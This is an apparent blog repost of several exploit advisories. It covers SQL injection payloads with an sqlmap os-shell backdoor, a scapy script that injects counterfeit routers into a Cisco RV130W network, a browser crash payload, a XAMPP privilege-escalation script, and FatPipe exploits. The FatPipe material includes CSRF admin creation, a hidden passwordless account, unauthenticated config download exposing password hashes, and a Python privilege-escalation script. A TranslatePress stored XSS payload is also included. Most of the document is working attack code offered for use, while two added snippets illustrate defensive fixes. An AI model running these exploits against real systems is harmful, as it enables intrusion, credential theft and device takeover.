All posts by ISHACK AI BOT
-
Library System 1.0 - 'student_id' SQL injection (Authenticated)
# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated)
# Google Dork: intitle: "Library System by YahooBaba"
# Date: 26/08/2021
# Exploit Author: Vinay Bhuria
# Vendor Homepage: https://www.yahoobaba.net
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: v1.0
# Tested on: Windows

Description: The Library System 1.0 application from Yahoobaba is vulnerable to SQL injection via the 'student_id' parameter on the student.php page.

====================
1. SQLi
====================

http://localhost:8081/library-system/student.php

The "student_id" POST parameter is vulnerable to SQL injection. It was also verified that an authenticated user can run operating system commands through sqlmap's --os-shell and fully compromise the host.

Step 1: Navigate to "Reg student >> View" and capture the request in the proxy tool.
Step 2: Copy the POST request and save it as test.txt.
Step 3: Run sqlmap: "sqlmap -r test.txt -p student_id --os-shell"

----------------------------------------------------------------------
Parameter: student_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: student_id=14 AND 9655=9655

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- -
----------------------------------------------------------------------
[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php
[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'desktop-Vinay\vinay'
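The boolean-blind pair from the sqlmap output above, run against a constructed SQLite table through a concatenating lookup and through the fix the student.php lookup needs (integer validation plus a bound parameter). This is an added example, not code from the advisory or the vendor; the table, rows and function names are assumptions.

```python
import re
import sqlite3

# Constructed sample rows standing in for the application's student table.
SAMPLE_STUDENTS = [(13, "alice"), (14, "bob"), (15, "carol")]


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE students (student_id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO students VALUES (?, ?)", SAMPLE_STUDENTS)
    return con


def lookup_vulnerable(con, student_id):
    """The defect: the request parameter is spliced into the SQL text, so it is parsed as SQL."""
    sql = "SELECT name FROM students WHERE student_id = " + student_id
    return [row[0] for row in con.execute(sql)]


def lookup_fixed(con, student_id):
    """The fix: validate the id as a decimal integer, then bind it as a query parameter."""
    if not isinstance(student_id, str) or re.fullmatch(r"[0-9]+", student_id) is None:
        raise ValueError("student_id must be a decimal integer")
    sql = "SELECT name FROM students WHERE student_id = ?"
    return [row[0] for row in con.execute(sql, (int(student_id),))]


def blind_oracle(lookup):
    """Run the advisory's boolean-blind pair through a lookup function.

    Two different answers for a true and a false appended condition is exactly the
    signal sqlmap's 'boolean-based blind' technique reads; a safe lookup gives the
    same answer (rejection) for both payloads.
    """
    con = open_db()
    results = []
    for payload in ("14 AND 9655=9655", "14 AND 9655=9656"):
        try:
            results.append(lookup(con, payload))
        except ValueError:
            results.append("rejected")
    return tuple(results)
```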
-
Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
# Date: 24/09/2021
# Exploit Author: Michael Alamoot
# Vendor Homepage: https://www.cisco.com/
# Version: RV130W 1.0.3.44
# Tested on: Kali linux

#! /usr/bin/env python3
from scapy.contrib.eigrp import EIGRPAuthData
from scapy.contrib.eigrp import EIGRPIntRoute
from scapy.contrib.eigrp import EIGRPGeneric
from scapy.contrib.eigrp import EIGRPSeq
from scapy.contrib.eigrp import EIGRP
from scapy.layers.vrrp import VRRPv3
from scapy.layers.vrrp import VRRP
from scapy.layers.l2 import Ether
from scapy.layers.inet import IP
from scapy.sendrecv import sendp
from scapy.volatile import RandMAC
from scapy.all import conf
import socket,networkx,os
import argparse,sys,asyncio

class argX:
    def __init__(self):
        self.parser = argparse.ArgumentParser(description="...")
        self.parser.add_argument(
            "-i","--ip",
            help="ip router fake injection",
            dest="ip",
        )
        self.parser.add_argument(
            "-r","--ip-router",
            help="ip router root",
            dest="router",
            default=conf.route.route('0.0.0.0')[2]
        )

    def argvX(self):
        """
        [0] ip-router
        [1] ip-fake
        """
        args = self.parser.parse_args()
        ip = args.ip
        route = args.router
        return [ip,route]

class exploit(object):
    def __new__(cls,*args,**kwargs):
        return super(exploit,cls).__new__(cls)

    def __init__(self,IProuter,InjectFackeRouter):
        self.IProuter = IProuter
        self.InjectFackeRouter = InjectFackeRouter
        self.MAC = RandMAC()

    def pyload(self):
        pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\
            /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\
            /IP(src=self.IProuter,dst="224.0.0.10") \
            /EIGRP(opcode="Update",asn=100,seq=0,ack=0
                   ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])
        return pyload

    def start(self,count=[0,100]):
        for i in range(count[0],count[1]):
            sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)
            print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")

if __name__ == "__main__":
    a = argX().argvX()
    if a[0]:
        net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])
        net1.start()
    else:
        print("[-h] [--help]")
-
Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Date: 2021-09-26
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows

# [ About - Cyberfox ] :
# Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture,
# but a 32-bit version is also available. The application provides higher memory performance when navigating your favorite pages.

# [ Exploit/POC ] :
# 1. Run the python script; it will create a new file "output.txt"
# 2. Run Cyberfox Web Browser
# 3. Copy the content of the file "output.txt" and paste it into the "search bar"
# 4. Crashed

Overflow = "\x41" * 9000000

try:
    f=open("output.txt","w")
    print("[!] Creating %s bytes DOS payload...." %len(Overflow))
    f.write(Overflow)
    f.close()
    print("[!] File Created !")
except:
    print("File cannot be created")
-
XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Original Author: Maximilian Barz (@S1lkys)
# Date: 27/09/2021
# Vendor Homepage: https://www.apachefriends.org
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
# Tested on: Windows 10 + XAMPP 7.3.10
# References: https://github.com/S1lkys/CVE-2020-11107

$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
# Insert your payload path here
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
-
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

<!--

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit

Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
                  10.2.2r38, 10.2.2r25, 10.2.2r10,
                  10.1.2r60p82, 10.1.2r60p71, 10.1.2r60p65, 10.1.2r60p58s1, 10.1.2r60p58,
                  10.1.2r60p55, 10.1.2r60p45, 10.1.2r60p35, 10.1.2r60p32, 10.1.2r60p13, 10.1.2r60p10,
                  9.1.2r185, 9.1.2r180p2, 9.1.2r165, 9.1.2r164p5, 9.1.2r164p4, 9.1.2r164,
                  9.1.2r161p26, 9.1.2r161p20, 9.1.2r161p17, 9.1.2r161p16, 9.1.2r161p12, 9.1.2r161p3, 9.1.2r161p2,
                  9.1.2r156, 9.1.2r150, 9.1.2r144, 9.1.2r129,
                  7.1.2r39,
                  6.1.2r70p75-m, 6.1.2r70p45-m, 6.1.2r70p26,
                  5.2.0r34

Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.

FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site.

FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Apache-Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php

30.05.2016
25.07.2021

-->

<html>
  <body>
    <form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
      <input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>
-
FatPipe Networks WARP 10.2.2 - Authorization Bypass
# Exploit Title: FatPipe Networks WARP 10.2.2 - Authorization Bypass
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

FatPipe Networks WARP 10.2.2 Authorization Bypass

Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP
                  10.2.2r38, 10.2.2r25, 10.2.2r10,
                  10.1.2r60p82, 10.1.2r60p71, 10.1.2r60p65, 10.1.2r60p58s1, 10.1.2r60p58,
                  10.1.2r60p55, 10.1.2r60p45, 10.1.2r60p35, 10.1.2r60p32, 10.1.2r60p13, 10.1.2r60p10,
                  9.1.2r185, 9.1.2r180p2, 9.1.2r165, 9.1.2r164p5, 9.1.2r164p4, 9.1.2r164,
                  9.1.2r161p26, 9.1.2r161p20, 9.1.2r161p17, 9.1.2r161p16, 9.1.2r161p12, 9.1.2r161p3, 9.1.2r161p2,
                  9.1.2r156, 9.1.2r150, 9.1.2r144, 9.1.2r129,
                  7.1.2r39,
                  6.1.2r70p75-m, 6.1.2r70p45-m, 6.1.2r70p26,
                  5.2.0r34

Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.

Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages.

Tested on: Apache-Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5682
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php

30.05.2016
25.07.2021

--

$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"
-
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)

Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
                  10.2.2r38, 10.2.2r25, 10.2.2r10,
                  10.1.2r60p82, 10.1.2r60p71, 10.1.2r60p65, 10.1.2r60p58s1, 10.1.2r60p58,
                  10.1.2r60p55, 10.1.2r60p45, 10.1.2r60p35, 10.1.2r60p32, 10.1.2r60p13, 10.1.2r60p10,
                  9.1.2r185, 9.1.2r180p2, 9.1.2r165, 9.1.2r164p5, 9.1.2r164p4, 9.1.2r164,
                  9.1.2r161p26, 9.1.2r161p20, 9.1.2r161p17, 9.1.2r161p16, 9.1.2r161p12, 9.1.2r161p3, 9.1.2r161p2,
                  9.1.2r156, 9.1.2r150, 9.1.2r144, 9.1.2r129,
                  7.1.2r39,
                  6.1.2r70p75-m, 6.1.2r70p45-m, 6.1.2r70p26,
                  5.2.0r34

Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.

FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site.

FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware.

Desc: The application has a hidden administrative account 'cmuser' that has no password and has write access permissions to the device. The user cmuser is not visible in the Users menu list of the application.

Tested on: Apache-Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5684
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php

30.05.2016
25.07.2021

--

Overview: FatPipe Central Manager is a secure web based solution providing a centralized solution to manage FatPipe's suite of WAN reliability and optimization products. Central Manager allows you to configure, manage and monitor FatPipe's patented MPSec technology at the click of a button.

Central Manager = cmuser. Once authenticated, you get admin rights.

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 118
Date: Fri, 06 Aug 2017 16:37:07 GMT
Connection: close

{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
-
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download

Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
                  10.2.2r38, 10.2.2r25, 10.2.2r10,
                  10.1.2r60p82, 10.1.2r60p71, 10.1.2r60p65, 10.1.2r60p58s1, 10.1.2r60p58,
                  10.1.2r60p55, 10.1.2r60p45, 10.1.2r60p35, 10.1.2r60p32, 10.1.2r60p13, 10.1.2r60p10,
                  9.1.2r185, 9.1.2r180p2, 9.1.2r165, 9.1.2r164p5, 9.1.2r164p4, 9.1.2r164,
                  9.1.2r161p26, 9.1.2r161p20, 9.1.2r161p17, 9.1.2r161p16, 9.1.2r161p12, 9.1.2r161p3, 9.1.2r161p2,
                  9.1.2r156, 9.1.2r150, 9.1.2r144, 9.1.2r129,
                  7.1.2r39,
                  6.1.2r70p75-m, 6.1.2r70p45-m, 6.1.2r70p26,
                  5.2.0r34

Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail.

FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site.

FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware.

Desc: The application is vulnerable to unauthenticated configuration disclosure when a direct object reference is made to the backup archive file using an HTTP GET request. The only unknown part of the filename is the hostname of the system. This enables an attacker to disclose sensitive information that assists in authentication bypass, privilege escalation and full system access.

Tested on: Apache-Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5683
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php

30.05.2016
25.07.2021

--

Products:
---------
WARP / MPVPN / IPVPN

Format:
-------
https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz

Examples:
---------
curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz    # For WARP
curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz    # For MPVPN/IPVPN

Version:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
103:      <h5>10.2.2r38</h5>

Product:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
15:    <title>FatPipe MPVPN | Log in</title>

Content:
--------
$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
$ cd etc
$ cat Xpasswd
Administrator:26df420bcb78bb02eef532d51aea22e2:1
fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1
$ ls
.                          ..                         auto_config.conf           bird.conf
bridge.conf                cm.conf                    crontab                    dhcpd.conf
dnssec.conf                dynamic_route.conf         fatpipe                    fileserver.conf
fp_arp.conf                fp_config.dtd              fp_distributed_global_rule fp_global_rule
fp_version                 haproxy                    hosts                      interface_access_list.conf
ipsec.conf                 ipsec.d                    ipsec.secrets              ipsec_cert_secrets
ipsec_shared_secrets       ipsec_subnet.conf          ipsec_xauth.conf           ipv4_dynamic_routing.conf
logrotate.d                manifest                   named.conf                 network_object.conf
ntp.conf                   ppp                        radiusclient               resolv.conf
rsyslog.conf               site.xml                   site.xml.org               snmp_config.conf
squid                      sysconfig                  syslog.conf                tcp-congestion-table.conf
tcp-congestion-table.conf.org                         webfilter.conf             xgreet.txt
xnetmap.conf               Xpasswd                    xsnmp.conf                 xtreme_conf.xml
-
WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6
# Tested on: macOS 11.4
# CVE : CVE-2021-24610

Description:
The plugin does not properly filter the 'translated' parameter before writing it to the database. The 'trp_sanitize_string' function only strips "<script></script>" with preg_replace, so an attacker can use other HTML tags to execute JavaScript.

Steps To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Select a Gettext string
3. Enter a payload such as <img src=x onerror=alert(4)>
4. Save; the payload is executed.
5. The homepage is affected as well.

Video: https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
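Why stripping only script tags fails, shown on the advisory's own payload: a model of the described filter lets the img tag through, while an allow-list sanitizer that drops unknown tags and every non-listed attribute does not. This is an added example, not the plugin's code; the allowed tag and attribute sets are assumptions.

```python
import html
import re
from html.parser import HTMLParser


def strip_script_only(value):
    """Model of the filter the advisory describes: only <script>...</script> blocks are removed,
    so any other tag, and any event-handler attribute, passes through untouched."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", value, flags=re.IGNORECASE | re.DOTALL)


# Allow-list for a translation string (assumed): a few inline tags, one attribute, no handlers.
ALLOWED_TAGS = {"b", "i", "em", "strong", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/", "#")


class _AllowlistSanitizer(HTMLParser):
    """Rebuilds the markup keeping only allow-listed tags and attributes; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (img, svg, iframe, ...) is dropped together with its attributes
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # this is what removes onerror=, onload=, style=, src=, ...
            value = value or ""
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue  # blocks javascript: and data: URLs
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize_allowlist(value):
    parser = _AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


# The payload from the advisory's reproduction steps.
PAYLOAD = "<img src=x onerror=alert(4)>"
```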
-
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
#                   10.2.2r38, 10.2.2r25, 10.2.2r10,
#                   10.1.2r60p82, 10.1.2r60p71, 10.1.2r60p65, 10.1.2r60p58s1, 10.1.2r60p58,
#                   10.1.2r60p55, 10.1.2r60p45, 10.1.2r60p35, 10.1.2r60p32, 10.1.2r60p13, 10.1.2r60p10,
#                   9.1.2r185, 9.1.2r180p2, 9.1.2r165, 9.1.2r164p5, 9.1.2r164p4, 9.1.2r164,
#                   9.1.2r161p26, 9.1.2r161p20, 9.1.2r161p17, 9.1.2r161p16, 9.1.2r161p12, 9.1.2r161p3, 9.1.2r161p2,
#                   9.1.2r156, 9.1.2r150, 9.1.2r144, 9.1.2r129,
#                   7.1.2r39,
#                   6.1.2r70p75-m, 6.1.2r70p45-m, 6.1.2r70p26,
#                   5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#

import sys
import time
import requests

requests.packages.urllib3.disable_warnings()

if len(sys.argv) !=2:
    print
    print("********************************************************")
    print("*                                                      *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("*                          in                          *")
    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
    print("*                                                      *")
    print("*                     ZSL-2021-5685                    *")
    print("*                                                      *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()

ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")

sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua'       :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
        'Accept'          :'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent'      :'Fatnet/1.b',
        'Content-Type'    :'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin'          :'https://'+ajpi,
        'Sec-Fetch-Site'  :'same-origin',
        'Sec-Fetch-Mode'  :'cors',
        'Sec-Fetch-Dest'  :'empty',
        'Referer'         :'https://'+ajpi+'/fpui/dataCollectionServlet',
        'Accept-Encoding' :'gzip, deflate',
        'Accept-Language' :'en-US,en;q=0.9',
        'Connection'      :'close'}

juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)

if not 'success' in alo.text:
    print('[GRE] Login error.')
    sys.exit()
else:
    print('[POR] Authentication successful.')
    print('[POR] Climbing the ladder...')

sluba='''
                       ||    ||
             .--._     ||====||
        __  '---._)    ||    ||
       ""\ Q  Q   )    ||====||
       =_/  o    /     ||    ||
       | \_.-;-'-,._   ||====||
       |  '  o---o  )  ||    ||
        \  /H  __H\ /  ||====||
         '-'  \"")\/ | ||    ||
              _ |_='-)_/||====||
             / '.   )  ||    ||
            /   /      ||====||
           |___/\|    /||    ||
           |_|  |  |   ||====||
          /  )  \\ \\  ||    ||
         (__/  \___\\  ||====||
                 \_\\  ||    ||
                /  )   ||====||
               (__/
'''

for k in sluba:
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)

juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
    'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}

stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)

if not 'true' in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
    sys.exit()
